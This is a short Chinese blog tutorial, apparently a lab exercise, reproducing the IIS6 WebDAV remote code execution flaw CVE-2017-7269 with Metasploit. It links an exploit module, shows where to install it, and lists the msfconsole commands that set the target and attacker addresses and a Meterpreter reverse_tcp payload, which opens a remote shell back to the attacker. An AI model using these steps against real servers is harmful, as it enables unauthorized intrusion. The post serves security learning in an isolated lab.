MSF之IIS6WebDAV执行漏洞复现

MSF之IIS6WebDAV执行漏洞复现

准备

实验准备环境:
靶机:虚拟机win2003 r2位系统,其IP为:10.101.63.150
攻击机:kali系统,其IP为:10.101.17.33
攻击工具:kali自带的msfconsole工具

  1. 靶机搭建iis6,可参考:https://jingyan.baidu.com/article/0aa22375bcffb388cc0d6419.html
    搭建好iis6后,需要开启WebDAV:
    在这里插入图片描述
  2. 下载CVE-2017-7269攻击模块
    下载exploit:https://github.com/Al1ex/CVE-2017-7269
    将下载包解压后得到的.rb文件,复制到下面的地址:
    /usr/share/metasploit-framework/modules/exploits/windows/iis
    在这里插入图片描述

扫描漏洞

进入msfconsole

use exploit/windows/iis/cve-2017-7269
show options
在这里插入图片描述

设置

set RHOST 10.101.63.150 <靶机ip>
set HTTPHOST 10.101.63.150 <设置靶机网络地址>
set LHOST 10.101.17.33 <设置攻击机ip>
set payload windows/meterpreter/reverse_tcp <设置返回载荷>
在这里插入图片描述
在这里插入图片描述

接下来,开始攻击!

exploit

在这里插入图片描述
在这里插入图片描述
成功!

猜你喜欢

转载自blog.csdn.net/qq_42280544/article/details/84655392